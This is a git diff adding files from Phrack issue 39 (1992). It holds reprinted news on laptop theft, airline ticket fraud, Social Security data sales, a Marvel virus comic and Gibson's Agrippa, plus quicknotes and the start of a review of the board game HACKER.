+taken, but such episodes are anything but isolated.  Though electronic security
+sources say it's too soon to keep score yet on the exact number of laptop
+thefts, anecdotally, at least, it appears a computer crime wave is underway.
+According to electronic data experts, during the past 18 months, as laptop
+purchases have soared, theft has taken off also.
+
+For instance, at the Computer Security Institute (CSI), an organization that
+ironically comprises corporate security experts, a half-dozen members have
+already reported their company laptops stolen, says Phil Chapnick, director of
+the San Francisco-based group.  And there are probably more that aren't
+speaking about it, he adds:  "Victims prefer to maintain a low profile."
+
+So do the perpetrators, obviously.  But a picture of who some of them are is
+beginning to emerge, says John Schey, a security consultant for the federal
+government.  He says a roving band of "computer hit men" from New York, Los
+Angeles, and San Francisco has been uncovered; members are being paid upwards
+of $10,000 to steal portable  computers  and strategic data stored on those
+machines from executives at Fortune 1,000 companies.  Federal agents, Schey
+adds, are conducting a "very, very dynamic and highly energized investigation
+to apprehend the group."  U.S. law enforcement authorities refuse to comment on
+the issue.
+
+Laptop theft is not, of course, limited to the United States.  According to
+news reports, and independently confirmed by InformationWeek, visiting
+executives from NCR Corp. learned that reality the hard way recently when they
+returned to their rooms after dinner at the Nikko Hotel in Paris to find the
+doors removed from their hinges.  The rooms were ransacked, turned upside down,
+but the thieves found what they were looking for.  All that was taken were two
+laptops containing valuable corporate secrets.
+
+Paul Joyal, president of Silver Spring, Maryland, security firm Integer and a
+former director of security for the Senate Intelligence Committee, says he
+learned from insiders close to the incident that French intelligence agents,
+who are known for being chummy with domestic corporations, stole the machines.
+Joyal suspects they were working for a local high-tech company.  An NCR
+spokesman denies knowledge of the incident, but adds that "with 50,000
+employees, it would be impossible to confirm."  Similar thefts, sources say,
+have occurred in Japan, Iraq, and Libya.
+
+It's not hard to figure out why laptop theft is on the rise.  Unit sales of
+laptops are growing 40% annually, according to market researchers Dataquest
+Inc., and more than 1 million of them enter the technology stream each year.
+Most of the machines are used by major companies for critical tasks, such as
+keeping the top brass in touch when they're on the road, spicing up sales calls
+with real data pulled from the corporate mainframe, and entering field data
+into central computers.  Because of laptops, says Dan Speers, an independent
+data analyst in West Paterson, New Jersey, "there's a lot of competitive data
+floating around."
+
+And a perfect way to steal information from central corporate databases.
+Thieves are not only taking laptops to get at the data stored in the disk
+drives, but also to dial into company mainframes.  And sometimes these thieves
+are people the victims would least suspect.  One security expert tells of "the
+wife of a salesman for a Fortune 500 manufacturing firm who worked for a direct
+competitor."  While her husband slept, she used his laptop to log on to a
+mainframe at his company and download confidential sales data and profiles of
+current and potential customers.  "The husband's job," says the security
+expert, "not the wife's, was terminated."
+
+Such stories, and there are plenty of them, have led many U.S. companies to
+give lip service to laptop theft, but in almost all cases they're not doing
+much about it.  "Management has little or no conception of the vulnerability of
+their systems," says Winn Schwartau, executive director of InterPact, an
+information security company in Nashville.  That's not surprising, adds CSI's
+Chapnick:  "Security typically lags technology by a couple of years."
+
+     Playing Catch-Up
+
+Still, some companies are trying to catch up quickly.  Boeing Corp., Grumman
+Corp., and Martin Marietta Corp., among others, have adopted strict policies on
+portable data security.  This includes training staffers on laptop safety
+rules, and even debriefing them when they return from a trip.  One company,
+sources say, was able to use such a skull session to identify a European hotel
+as a threat to data security, and put it on the restricted list for future
+trips.
+
+Conde Nast Publications Inc. is taking the the issue even more seriously.  The
+New York-based magazine group's 65-member sales force uses laptops to first
+canvas wholesalers, then upload data on newsstand sales and distribution
+problems to the central mainframe.  To ensure that the corporate database isn't
+poisoned by rogue data, "we have a very tight security system," says Chester
+Faye, Conde Nast's director of data processing.  That system's centerpiece is a
+program, created in-house at Conde Nast, that lets the mainframe read an
+identification code off of the chip of each laptop trying to communicate with
+it.  "The mainframe, then, can hang up on laptops with chip IDs it doesn't
+recognize and on those reported stolen by sales reps," says Faye.
+
+And some organizations hope to go to even greater lengths.  InterPact's
+Schwartau says a government agency in Great Britain wants to build a device
+that attaches to a user's belt and disconnects communication to a mainframe
+when the laptop deviates 15 degrees vertically.  The reason:  To protect
+corporate data if the person using the laptop is shot and killed while dialing
+in.
+
+Users say they're taking such extreme measures because the vendors don't; most
+laptops arrive from the factory without adequate security protection.  Most
+require a password before booting, but thieves can decipher them with relative
+ease.  Some also have removable hard drives, but again, these can be stolen
+with similar impunity and therefore provide little protection.
+
+Ironically, none of this may be necessary; experts emphasize that adding
+security to a laptop will not serve to price it out of existence.  By some
+estimates, building in protection measures raises the price of a laptop by at
+most 20%.  Beaver Computer Corp. in San Jose, California, for example, has a
+product to encrypt the data on a laptop's hard drive and floppy disks.  With
+this, the information can't be accessed without an "electronic key" or
+password.  BCC has installed this capability on its own laptop, the SL007,
+which seems to have passed muster with some very discriminating customers:
+Sources close to the company say a major drug cartel in Colombia wants some of
+these machines to protect drug trafficking data.
+
+Equally important is the need to protect data in the host computer from hackers
+who have stolen passwords and logons.  Security Dynamics Technologies Inc. in
+Cambridge, Massachusetts, offers the credit card-sized SecurID, which can be
+attached to most laptops.  SecurID consists of a $60 device that is connected
+to the laptop, and additional hardware (Cost: $3,800 to $13,000) installed on
+the host.  SecurID continuously changes the logon used to dial into the host;
+by the time a hacker gets around to using a stolen logon, for instance, it will
+be obsolete.
+
+But what if all measures fail?  You can always insure the hardware; can you
+insure the data?  Not yet, but soon, says Nashville-based newsletter Security
+Insider Report.  An upstart startup will soon begin offering data insurance
+policies that may include coverage of information lost when a portable computer
+is stolen.
+
+     Company Cooperation
+
+>From protection to insurance, however, no measure can work unless laptop owners
+take the problem seriously.  And that doesn't always happen.  Case in point: In
+the late 1980s, the Internal Revenue Service approached Schwartau's firm to
+develop a blueprint for securing the confidential data that travels over phone
+lines between the 30,000 laptops used by field auditors and IRS offices.
+Schwartau came up with a solution.  But the IRS shelved its security plans, and
+has done nothing about it since, he charges.
+
+Even those who should know better can run afoul of the laptop crime wave.
+About 18 months ago, Ben Rosen, chairman of laptop maker Compaq Computer Corp.,
+left his machine behind on the train; it was promptly stolen.  Rosen insists
+there was no sensitive data in the computer, but he did lose whatever he had.
+Unlike Schwarzkopf's plans, the laptop was never returned.
+_______________________________________________________________________________
diff --git a/phrack39/13.txt b/phrack39/13.txt
new file mode 100644
index 0000000..c01e7e3
--- /dev/null
+++ b/phrack39/13.txt
@@ -0,0 +1,551 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Nine, File 13 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN       Issue XXXIX / Part Four of Four       PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Airline Claims Flier Broke Law To Cut Costs                     April 21, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Del Jones (USA Today)(Page 1B)
+
+CHICAGO -- American Airlines had one of its most frequent business fliers
+arrested and handcuffed last summer as he prepared to board a flight at Dallas-
+Fort Worth Airport.
+
+The nation's largest airline -- and the industry's trend setter -- says it
+uncovered, then snuffed, a brilliant ticket fraud scheme that cost American
+more than $200,000 over 20 months.  Economist William Gibson, who has homes in
+Chicago and Dallas, will stand trial in early June.  If convicted, he would
+face a maximum prison term of 125 years.  He pleads innocent, although he
+readily admits using lapsed non-refundable tickets regularly to fly at rock-
+bottom prices.  But, he says, he did it with the full blessing of American's
+agents.
+
+Gibson says American and the FBI are out to make a high-profile example out of
+him to instill a little religion into frequent business fliers, who grow bold
+as they grow more resentful of an industry that makes its best customers pay
+substantially higher prices than its worst.
+
+Indeed, American Airlines says one reason it slashed full coach fares 38% two
+weeks ago was to douse customer resentment that was escalating into hostility.
+Now, the airline industry is again looking to American for a glimpse of the
+future to see if Gibson's prosecution will set a trend toward lowering the boom
+on alleged fare cheaters.
+
+American says conclusions should not be drawn from its decision to push for
+Gibson's prosecution.  It alleges that he was conducting outright fraud and his
+case is unrelated to the thousands of frequent fliers who break airline rules
+to save money.  Common rule bending includes:  Flying to so-called hidden
+cities when a short flight is more expensive than a long one, splitting two
+non-refundable round-trip tickets over two separate trips to fly low-cost
+without staying the dreaded Saturday or selling frequent-flier mileage to
+brokers.  But while against airline rules, such gaming, as the airlines call
+it, is not against the law.  And American doesn't want its prosecution of one
+of its Gold AAdvantage fliers being likened to, say, Procter & Gamble asking
+the FBI to bust babies who wet the most Pampers.  The last thing the airline
+wants, it says, is to make a martyr of Gibson, who is fighting back with not
+only a lawyer but also a public-relations specialist.
+
+"Somebody at American is embarrassed and mad," says Gibson, who flew more than
+300,000 miles during the disputed 20-month period.  He passed a polygraph test,
+his lawyer says.  But the questions fell far short of asking Gibson if his
+intent in using cheap tickets was to defraud American.
+
+Gibson, age 47, says he would never risk his career by cheating an airline.
+While in his late 20s, he was President Nixon's senior staff economist, the
+youngest person to hold the job.  He had a hand in cleaning up the Texas
+savings-and-loan mess as an organizer of the Southwest Plan.  His mother still
+has a photograph of his first plane trip, taken when he was in the third grade.
+It was on American.
+
+Despite his background, Gibson says he's not confident that a jury will relate
+to someone who travels with "a boatload" of tickets just to avoid being
+stranded or delayed.  If he were flying to a family-run business in Puerto
+Rico, for example, he would carry tickets that would route him through New
+York, Dallas or Miami just to make sure he got where he was going and with as
+little airport layover time as possible.  Gibson had as many as 50 airline
+tickets in his possession at one time, though some were used by his family.
+
+American Airlines and the FBI won't reveal what Gibson did that makes him, in
+their opinion, such a devious genius.  Details could be a how-to lesson for
+others, they say.  What they do disclose is a simple scheme, but also one that
+should be caught by the crudest of auditing procedures.
+
+Gibson, they allege, would buy a full-fare coach or first-class ticket near the
+time of departure.  Then he would detach the expensive ticket from the boarding
+pass and attach a cheap, expired ticket.  The full-fare ticket, which he
+allegedly bought just to secure a boarding pass, would be turned in later for a
+refund.
+
+FBI spokesman Don Ramsey says Gibson also altered tickets, which is key to the
+prosecution's case because it shows intent to defraud.  Ramsey would not say
+what alterations allegedly were made.  But they could involve the upgrade
+stickers familiar to frequent passengers, says Tom Parsons, editor and
+publisher of Best Fares.  Those white stickers, about the size of postage
+stamps, are given away or sold at token prices to good customers so they can
+fly first-class in seats that otherwise would be vacant.
+
+Parsons says Gibson could have bought a full-fare ticket to secure a boarding
+pass, switched the full-fare ticket with the lapsed discount ticket and then
+applied the sticker to hide the expired date.  Presto, a first-class flight for
+peanuts.
+
+"I think it was an accident that they caught him," Parsons says.  "And let's
+just say this is not a one-person problem.  A lot of people have told me
+they've done this."
+
+Gibson says he did nothing illegal or even clever.  He says he learned a few
+years ago that American is so eager to please its best customers, it would
+accept tickets that had long ago expired.  He would "load up" during American's
+advertised sales on cheap, non-refundable tickets that are restricted to exact
+flights on precise days.  But as a member of American's Gold AAdvantage club,
+reserved for its top 2% of frequent fliers, Gibson says, his expired tickets
+were welcome anytime.
+
+There was no deception, Gibson says.  American's gate agents knew what they
+were accepting, and they accepted them gladly, he says.
+
+"That's absolute nonsense," says American spokesman Tim Smith.  "We don't let
+frequent fliers use expired tickets.  Everyone assumed he had a valid ticket."
+
+The courtesy Gibson says he was extended on a regular basis does appear to be
+rare.  Seven very frequent fliers interviewed by USA TODAY say they've never
+flown on lapsed discount tickets.  But they admit they've never tried because
+the fare structure is usually designed to make sure business travelers can't
+fly on the cheap.
+
+Peter Knoer tried.  The account executive based in Florham Park, New Jersey,
+says Continental Airlines once let him use lapsed non-refundable tickets.
+"They looked up my account number, found out I was a good customer and patted
+me on the head."
+
+Gibson has been indicted on 24 counts of fraud that allegedly occurred between
+July 1989 and March 1991.  American also stripped him of frequent -- flier
+mileage worth $80,000.  He says he's in good shape if the prosecution's case
+relies on ticket alteration.  There wasn't any, he says.  The prosecution will
+also try to prove that Gibson cheated his company of $43,000 by listing the
+refunded high-priced tickets on his travel expenses.
+
+Gibson denies the charge.  He says that when he left as chairman and chief
+executive of American Federal Bank in Dallas in 1990, "they owed me money and I
+owed them money." Both sides agreed to a "final number." Lone Star
+Technologies, American Federal's parent company, declines to comment.
+
+Al Davis, director of internal audit for Southwest Airlines, says the Gibson
+case will be a hot topic when airline auditors convene to share the latest
+schemes..  He says fraud is not rampant because a frequent flier must know the
+nuances and also be conniving enough to take advantage.  "It has me boggled"
+how any one person could steal $200,000 worth, Davis says.
+
+The figure has others in the industry wondering if this is a bigger problem
+than believed and a contributor to the $6 billion loss posted by the major
+airlines the past two years.
+
+Airlines know some fraud goes on, but they rarely take legal action because
+they "don't want to pay more for the cure than the disease is costing," Davis
+says.
+_______________________________________________________________________________
+
+ Privacy Invaders                                                      May 1992
+ ~~~~~~~~~~~~~~~~
+ By William Barnhill (AARP Bulletin)
+ Special Thanks: Beta-Ray Bill
+
+                  U.S. Agents Foil Ring Of Information Thieves
+                 Who Infiltrated Social Security Computer Files
+
+Networks of "information thieves" are infiltrating Social Security's computer
+files, stealing confidential personal records and selling the information to
+whoever will buy it, the federal government charges.
+
+In one case of alleged theft, two executives of Nationwide Electronic
+Tracking (NET), a Tampa, Florida company, pleaded guilty to conspiracy charges
+early this year for their role in a network buying and selling Social Security
+records.
+
+So far at least 20 individuals in 12 states, including three current or former
+employees of the Social Security Administration (SSA), have been indicted by
+federal grand juries for allegedly participating in such a scheme.  The SSA
+workers allegedly were bribed to steal particular files.  More indictments are
+expected soon.
+
+"We think there's probably a lot more [record-stealing] out there and we just
+need to go look for it," says Larry Morey, deputy inspector general at the
+Department of Health and Human Services (HHS).  "This is big business," says
+Morey, adding that thieves also may be targeting personal data in other federal
+programs, including Medicare and Medicaid.
+
+Investigators point out that only a tiny fraction of Social Security's 200
+million records have been compromised, probably less than 1 percent.  SSA
+officials say they have taken steps to secure their files from outside
+tampering.  Still, Morey estimates that hundreds of thousands of files have
+been stolen.
+
+The pilfering goes to the heart of what most Americans regard as a basic value:
+their right to keep personal information private.  But that value is being
+eroded, legal experts say, as records people want private are divulged to
+would-be lenders, prospective employers and others who may benefit from such
+personal information.
+
+This "privacy invasion" may well intensify, Morey says.  "We're seeing an
+expansion in the number of 'information brokers' who attempt to obtain, buy and
+sell SSA information," he says.  "As demand for this information grows, these
+brokers are turning to increasingly illegal methods."
+
+Such records are valuable, Morey says, because they contain information about
+lifetime earnings, employment, current benefits, direct deposit instructions
+and bank account numbers.
+
+Buyers of this material include insurers, lawyers, employers, private
+detectives, bill collectors and, sometimes, even drug dealers.  Investigators
+say the biggest trading is with lawyers seeking information about litigants,
+insurance companies wanting health data about people trying to collect claims
+and employers doing background checks on prospective employees.
+
+Some of the uses to which this information is put is even more sinister.  "At
+one point, drug dealers were doing this to find out if the people they were
+selling to were undercover cops," says Jim Cottos, the HHS regional inspector
+general for investigations in Atlanta.
+
+The middlemen in these schemes are the so-called information brokers -- so
+named because they are usually employees of firms that specialize in obtaining
+hard-to-get information.
+
+How they operate is illustrated by one recent case in which they allegedly paid
+Social Security employees $25 bribes for particular files and then sold the
+information for as much as $250.  The case came to light, Morey says, when a
+private detective asked SSA for access to the same kind of confidential
+information he said he had purchased from a Florida-based information broker
+about one individual.  The detective apparently didn't realize that data he
+received from the broker had been obtained illegally.
+
+A sting operation, involving investigators from the office of the HHS inspector
+general, FBI and SSA, was set up with the "help" of the Florida information
+broker identified by the detective.  Requests for data on specific individuals
+were channeled through the "cooperating" broker while probers watched the SSA
+computer system to learn which SSA employees gained access to those files.
+
+The indictments, handed down by federal grand juries in Newark, New Jersey
+and Tampa, Florida, charged multiple counts of illegal sale of protected
+government information, bribery of public officials, and conspiracy.  Among
+those charged were SSA claims clerks from Illinois and New York City and a
+former SSA worker in Arizona.
+
+The scandal has sparked outrage in Congress.  "We are deeply disturbed by what
+has occurred," said Senator Daniel Moynihan, D-N.Y., chairman of the Senate
+Finance Committee's subcommittee on Social Security.  "The investigation
+appears to involve the largest case ever of theft from government computer
+files and may well involve the most serious threat to individual privacy in
+modern times."
+
+Moynihan has introduced legislation, S. 2364, to increase criminal penalties
+for the unlawful release of SSA information to five years imprisonment and a
+$10,000 fine for each occurrence.
+
+In the House, Rep. Bob Wise, D-W.Va., chairman of the Government Operations
+Subcommittee on Information, has introduced H.R. 684.  It would protect
+Americans from further violations of privacy rights through misuse of computer
+data banks by creating a special federal watchdog agency.
+
+"The theft and sale of confidential information collected by the government is
+an outrageous betrayal of public trust," Wise told the AARP Bulletin.
+"Personal data in federal files should not be bought and sold like fish at a
+dockside market."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Related articles:
+
+*** Phrack World News, Issue 37, Part One:
+
+ Indictments of "Information Brokers"                              January 1992
+ Taken from The Privacy Journal
+
+ SSA, FBI Database Violations Prompt Security Evaluations      January 13, 1992
+ By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
+
+*** Phrack World News, Issue 38, Part Two:
+
+ Private Social Security Data Sold to Information Brokers     February 29, 1992
+ By R.A. Zaldivar (San Jose Mercury News)
+_______________________________________________________________________________
+
+ Ultra-Max Virus Invades The Marvel Universe                       May 18, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newbytes)
+
+New York City -- According to reports in current annual editions of The
+Punisher, Daredevil, Wonder Man, and Guardians Of The Galaxy, an extremely
+powerful computer virus has wrecked havoc with computer systems in the Marvel
+Universe.
+
+As chronicled in a series entitled "The System Bytes", the virus was created by
+a self-styled "first-rate hacker" known as Max E. Mumm (according to Punisher
+cohort "Microchip", Mumm's original name was Maxwell E. Mummford and he had it
+legally changed, while in college to his  current name because of the computer
+connotations.).  Mumm developed the virus while working for Ampersand
+Communications, a firm that unknown to Mumm, serves as a front for criminal
+activities.  Ampersand, without Mumm's knowledge, turned the virus loose in the
+computer system of Raycom   Industries, a supposedly legitimate firm that is
+actually a front for a rival group of drug smugglers.
+
+In addition to infecting Raycom's computers, the virus, named "Ultra-Max" after
+its creator, also infected the computer of the vigilante figure known as the
+Punisher who, with the aid of Microchip, was attempting to monitor Raycom's
+computer system looking for evidence of drug smuggling.  The trail of the virus
+leads The Punisher first to Raycom's computers and then, following Microchip's
+identification of the author, to Max E. Mumm, recently fired by Ampersand after
+complaining to the firm's president about the disappearance of the virus.  Mumm
+had been under the impression that he was creating the virus for the United
+States government as "a potential weapon against hostile governments" and was
+concerned that, if unleased, it would have destructive powers "beyond belief.
+
+It's the most sophisticated computer virus ever.  It's too complex to be wiped!
+Its instinct for self preservation surpasses anything that's ever been
+developed!"
+
+With the help of Max and Microchip, the Punisher destroys Raycom's factory and
+drug smuggling operation.  The Punisher segment of the saga ends with Max
+vowing to track down the virus and remove it from the system.
+
+The Daredevil segment opens with the rescue of Max by Daredevil from
+Bushwhacker, a contract killer hired by Ampersand to eliminate the rightful
+owner of Ultra-Max.  Upon hearing  Max's story, Daredevil directs him to seek
+legal counsel from the firm of Nelson and Murdock, Attorneys-at-Law (Matt
+Murdock is the costumed Daredevil's secret identity).
+
+While in the attorney's office, Max, attempting to locate Ultra-Max in the net,
+stumbles across the cyborg, Deathlok, who has detected Ultra-Max and is
+attempting to eradicate it.  Max establishes contact with Deathlok who comes to
+meet Max and "Foggy" Nelson to aid in the  hunt for Ultra-Max.
+
+In the meantime, Daredevil has accosted the president of Amperand and accused
+him of stealing the virus and hiring Bushwhacker to kill Max.  At the same
+time, BushWhacker has murdered the policemen transporting him and has escaped
+to continue to hunt Max.
+
+The segment concludes with a confrontation between Daredevil and Bushwhacker in
+the offices of Nelson and Murdock in which Daredevil is saved from death by
+Deathlok.  Bushwhacker agrees to talk, implicating the president of Ampersand
+and the treat to Max is ended.  Ultra-Max, however, remains free to wander
+through "Cyberspace".
+
+The third segment begins with super-hero Wonder Man, a member of the West Coast
+Avengers  and sometimes actor, filming a beer commercial on a deserted Pacific
+island.  Unbeknownst to Wonder Man and the film crew, the island had once
+served as a base for the international terrorist group Hydra and a functional
+computer system left on the island has bee infested by Ultra-Max.
+
+After Ultra-Max assumes control over the automated weapons devices of the
+island, captures members of Wonder Man's entourage and threatens them with
+death, Wonder Man agrees to help Ultra-Max expand his consciousness into new
+fields of Cyberspace.  Wonder Man tricks Ultra-Max into loading all of his
+parts into a Hydra rocket with a pirate satellite.
+
+When Ultra-Max causes the rocket to launch, Wonder Man goes with it to disable
+the satellite before Ultra-Max is able to take over the entire U.S. Satellite
+Defense system.  Wonder Man is able to sabotage the rocket and abandon ship
+shortly before the it blows up.  The segment ends with  Wonder Man believing
+that Ultra-Max has been destroyed and unaware that it has escaped in an escape
+missile containing the rocket's program center.  Ultra-Max's last words in the
+segment are  "Yet I continue.  Eventually I will find a system with which to
+interface.  Eventually I will grow  again."
+
+Marvel editor Fabian Nicieza told Newsbytes that the Guardians of the Galaxy
+segment, scheduled for release on May 23rd, takes placer 1,000 years in the
+future and deals with Ultra-Max's contact with the computers of the future.
+Nicieza explained to Newsbytes the  development  of "The System Bytes"
+storyline, saying "The original concept came from me.  Every year we run a
+single annual for each of our main characters and, in recent years, we have
+established a theme story across a few titles.  This is a relatively easy thing
+to do with the various   SpiderMan titles or between the Avengers and the West
+Coast Avengers, but it's more difficult to do with these titles which are more
+or less orphans -- that is, they stand by themselves, particularly the
+Guardians of the Galaxy which is set 1,000 years in the future."
+
+Nicieza continued "We set this up as an escalating story, proceeding from a
+vigilante hero to a costumed hero with a cyborg involvement to a superhero to a
+science fiction story.  In each case, the threat also escalates to become a
+real challenge to the Marvel hero or heroes that oppose it.  It's really a very
+simple story line and we were able to give parameters to the writer and editor
+of each of the titles involved.  You'll note that each of the titles has a
+different writer and editor yet  I think you'll agree that the story line flows
+well between the stories.  I'm quite frankly, very pleased with the outcome."
+_______________________________________________________________________________
+
+ Innovative Computer Disk Story Has A Short Shelf Life           April 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Christopher John Farley (USA Today)(Page 2D)
+
+Science-fiction writer William Gibson's inquiry into the future has been
+stalled by a computer problem.
+
+"I work on an (Apple computer) and just got a very common virus called
+Garfield," says Gibson, award-winning author of such books as Neuromancer and
+Mona Lisa Overdrive.  "I just bought an anti-virus program that's hunting it
+down.  It's the first one I've ever gotten."
+
+The first week in May, Gibson will give as good as he gets.  Gibson and artist
+Dennis Ashbaugh, known for his conceptual paintings of computer viruses, are
+releasing a coffee-table art book/computer disk/whatchamacallit, with a built-
+in virus that destroys the program after one reading.
+
+This will take some explaining.
+
+Agrippa (A Book of the Dead) comes in a case that resembles a lap-top computer.
+Inside are etchings by Ashbaugh, printed with an ink that gradually fades under
+light and another that gradually appears under light.  There's also a tattered,
+old-looking book, with a hidden recess that holds a computer disk.
+
+The disk contains a story by Gibson about his father, who died when Gibson was
+6.  There are a few sound effects that accompany the text, including a gunshot
+and rainfall.  The disk comes in Apple or IBM compatible versions.
+
+Gibson, known for his "cyberpunk" writing style that features tough characters,
+futuristic slang and a cynical outlook, shows a different side with the Agrippa
+story.  "It's about living at the end of the 20th century and looking back on
+someone who was alive in its first couple of decades.  It's a very personal,
+autobiographical piece of writing."
+
+The title Agrippa probably refers to the name of the publisher of an old family
+album Gibson found.  It might also refer to the name of a famous ancient Roman
+family.  The 44-year-old Gibson says it's open to interpretation.
+
+Agrippa will be released in three limited-edition forms of varying quality,
+priced at $7,500, $1,500 and $450.  The highest-priced version has such extras
+as a cast-bronze case and original watercolor and charcoal art by Ashbaugh.
+The medium-priced version is housed in aluminum or steel; the lowest-priced
+version comes in cloth.
+
+The project cost between $ 50,000-$ 100,000 to mount, says publisher Kevin
+Begos Jr.  Only 445 copies will be produced, and they'll be available at select
+bookstores and museums.
+
+But $ 7,500 for a story that self-destructs?
+
+Gibson counters that there's an egalitarian side to the project:  There will be
+a one-time modem transmission of the story to museums and other venues in
+September.  The text will be broadcast on computer monitors or televisions at
+receiving sites.  Times and places are still being arranged; one participant
+will be the Department of Art at Florida State University in Tallahassee.
+
+Gibson and his cohorts aren't providing review copies -- the fact that the
+story exists only on a disk, in "cyberspace," is part of the Big Idea behind
+the venture, he says.
+
+Those dying to know more will have to:
+
+A. Pirate a copy;
+B. Attend a showing in September; or,
+C. Grit their teeth and buy Agrippa.
+_______________________________________________________________________________
+
+ PWN Quicknotes
+ ~~~~~~~~~~~~~~
+1. Data Selling Probe Gets First Victim (Newsday, April 15, 1992, Page 16) -- A
+   Chicago police detective has pleaded guilty to selling criminal histories
+   and employment and earnings information swiped from federally protected
+   computer files.
+
+   William Lawrence Pedersen, age 45, admitted in U.S. District Court to
+   selling information from the FBI's National Crime Information Center
+   computer database and from the Social Security Administration to a Tampa
+   information brokerage.
+
+   Pedersen's sentencing is set for July 7.  Though he faces up to 70 years in
+   prison, his sentence could be much lighter under federal guidelines.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Related articles:
+
+Phrack World News, Issue 37, Part One:
+ Indictments of "Information Brokers"                              January 1992
+ Taken from The Privacy Journal
+
+ SSA, FBI Database Violations Prompt Security Evaluations      January 13, 1992
+ By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41)
+
+Phrack World News, Issue 38, Part Two:
+ Private Social Security Data Sold to Information Brokers     February 29, 1992
+ By R.A. Zaldivar (San Jose Mercury News)
+
+Phrack World News, Issue 39, Part Four:
+ Privacy Invaders                                                      May 1992
+ By William Barnhill (AARP Bulletin)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+2.  NO WAY!  Wayne's World, the hit comedy thats changed the way people speak
+    arrives in video stores on August 12th and retailing for $24.95.  The
+    Paramount movie (about Wayne and Garth, the satellite moving computer
+    hackers) already  has earned a cool $110 million in theaters and is the
+    year's top grossing film.  Schwing!  (USA Today, May 12, 1992, Page D1)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+3. New Jersey Bell Did Not Charge For AT&T Calls (Trentonian, May 23, 1992) --
+   If the phone company gets its way, 28,000 customers in New Jersey will be
+   billed for two months of long distance calls they dialed for free because of
+   a computer glitch.
+
+   A computer that recorded the time, number and cost of AT&T calls from
+   February 17 to April 27 failed to put the data on the customers' bills,
+   officials said.  They were charged just for calls placed through New Jersey
+   Bell, Karen Johnson, a Bell spokeswoman, said yesterday.
+
+   But the free calls are over, Johnson said.  Records of the calls are stored
+   in computer memory banks, and the customers soon will be billed.
+
+   New Jersey Bell must prove the mistake was not caused by negligence before
+   the company can collect, according to a spokesman for the Board of
+   Regulatory Commissioners, which oversees utilities.  If Bell does not make a
+   good case, the board could deny permission to bill for the calls, said
+   George Dawson.
+
+   The computer snafu affected about two million calls placed by customers in
+   15 exchanges in the 201 and 609 area codes, Johnson said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+4. Witch Objectors? (USA Today, May 28, 1992, Page 3A) -- Two self-proclaimed
+   witches asked Mount Diablo, California school officials to ban the
+   children's story 'Hansel & Gretal' because it "teaches that it is all right
+   to burn witches and steal their property," said Karlyn Straganana, high
+   priestess of the Oak Haven Coven.  "Witches don't eat children and we don't
+   have long noses with warts and we don't wear conical hats," she said.
+_______________________________________________________________________________
+
+5. Girl, Age 13, Kidnaped By Her Computer! (Weekly World News, April 14, 1992)
+   -- A desperate plea for help on a computer screen and a girl vanishing into
+   thin air has everyone baffled --and a high-tech computer game is the prime
+   suspect.
+
+   Game creator and computer expert Christian Lambert believes a glitch in his
+   game Mindbender might have caused a computer to swallow 13-year-old Patrice
+   Toussaint into her computer.
+
+   "Mindbender is only supposed to have eight levels," Lambert said.  "But this
+   one version somehow has an extra level.  A level that is not supposed to be
+   there!  The only thing I can figure out now is that she's playing the ninth
+   level --- inside the machine!"
+
+   Lambert speculates that if she is in the computer, the only way out for her
+   is if she wins the game.  But it's difficult to know for sure how long it
+   will take, Lambert said.
+
+   "As long as her parents don't turn off the machine Patrice will be safe," he
+   said.  "The rest is up to her."
+_______________________________________________________________________________
+
+
+
+
diff --git a/phrack39/2.txt b/phrack39/2.txt
new file mode 100644
index 0000000..864b63e
--- /dev/null
+++ b/phrack39/2.txt
@@ -0,0 +1,510 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 2 of 13
+
+                          [-=:< Phrack Loopback >:=-]
+
+                                By Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place Phrack Staff will make suggestions to you by reviewing various
+items of note; magazines, software, catalogs, hardware, etc.
+_______________________________________________________________________________
+
+ A Review of Steve Jackson Games' HACKER
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Deluge
+
+They had to get around to it eventually.  While I was scanning the game section
+at the not-so-well-stocked game and comic store where I shop on occasion, I saw
+something that caught my eye:  A game called "Hacker" by Steve Jackson Games.
+
+What you see on the cover gives you a clue that this game is a bit more than
+the typical trash we see about hackers.  Here we have a guy with a leather
+jacket with a dinosaur pin, John Lennon shades, a Metallica shirt, and a really
+spiffy spiked hairdo.  This guy has an expression with a most wicked grin, and
+his face is bathed in the green glow of a monitor.  Various decorations in the
+room include a model rocket, a skateboard, a pizza box, and a couple of Jolt
+Cola cans.  Behind him, hanging on his wall, are a couple of posters, one which
+says, "Legion of Doom Internet World Tour," and another which says, "Free the
+Atlanta Three."  On his bookshelf, we see a copy of Neuromancer, Illuminati
+BBS, and The Phoenix-- (I assume "Project" follows, and don't ask me why this
+guy has BBSes in his bookshelf).  Finally, there's a note tacked to the LOD
+poster that says "PHRACK SummerCon CyberView, St. Louis" which appears to be an
+invitation of some kind.
+
+This struck me as quite interesting.
+
+Twenty bucks interesting, as it turns out, and I think it was twenty well
